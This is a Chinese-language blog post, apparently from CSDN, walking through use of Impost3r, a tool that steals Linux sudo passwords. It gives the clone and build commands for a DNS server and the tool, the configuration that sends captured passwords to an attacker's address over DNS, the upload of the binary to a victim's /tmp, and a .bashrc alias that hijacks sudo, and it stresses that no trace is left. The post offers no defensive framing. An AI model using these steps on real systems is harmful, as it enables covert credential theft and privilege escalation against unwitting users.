sudo密码窃取

本文介绍了Impost3r,一个用C语言编写的用于窃取Linux系统中sudo密码的工具。通过DNS协议通信,攻击者可以在普通用户权限下设置陷阱,获取合法用户的sudo密码。攻击流程包括使用fdns搭建DNS服务端,安装并配置Impost3r,修改.bashrc文件以劫持sudo命令,最终在目标机器上执行命令并捕获密码。该工具隐蔽性强,窃取成功后不会在目标机器上留下明显痕迹。
摘要由CSDN通过智能技术生成

sudo密码窃取
工具链接:https://github.com/ph4ntonn/Impost3r

mpost3r是一个利用C语言编写,用来窃取linux下sudo密码的工具。

用户可使用此程序在普通用户权限下,制造水坑,窃取合法用户的sudo密码。

DNS协议通信

使用fdns搭建dns服务端

git clone https://github.com/deepdarkness/Fdns

编译

cd Fdns/src
gcc -o dns main.c util.c

运行

./dns

安装impostr

git clone https://github.com/ph4ntonn/Impost3r

修改代码中的ip地址

/*
    Custom setting
*/
# define FILENAME "/tmp/.impost3r" \\设置Impost3r在目标服务器上的位置
# define BACKUP_BASHRC "/tmp/.bashrc" \\设置攻击者备份的源.bashrc在目标服务器上的位置
# define SAVE_OR_SEND 0 \\设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0,保存=1,默认为发送)
/*
    Send to server
*/
# define MAX_RESEND 30 \\设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数
# define RESEND_INTERVAL 5 \\设置每一次发送密码的间隔
# define REMOTE_ADDRESS "192.168.0.12" \\设置回送密码的远程地址
# define REMOTE_PORT 53 \\设置回送密码的远程端口

/*
    Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" \\设置结果文件保存的位置,在SAVE_OR_SEND设置为1的情况下

执行make命令编译

我们将生成的.impost3r上传到受害机器的/tmp目录下。

拷贝一份.bashrc文件:

cp ~/.bashrc /tmp/

修改原有的.bashrc文件:

将以下代码加入文件的最后:

alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'

当目标机器上执行 sudo 命令,并输入正确的密码之后,我们会在自己的 VPS 上看到传输过来的正确密码。这些操作完成之后,在目标机器上不会留下任何痕迹。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值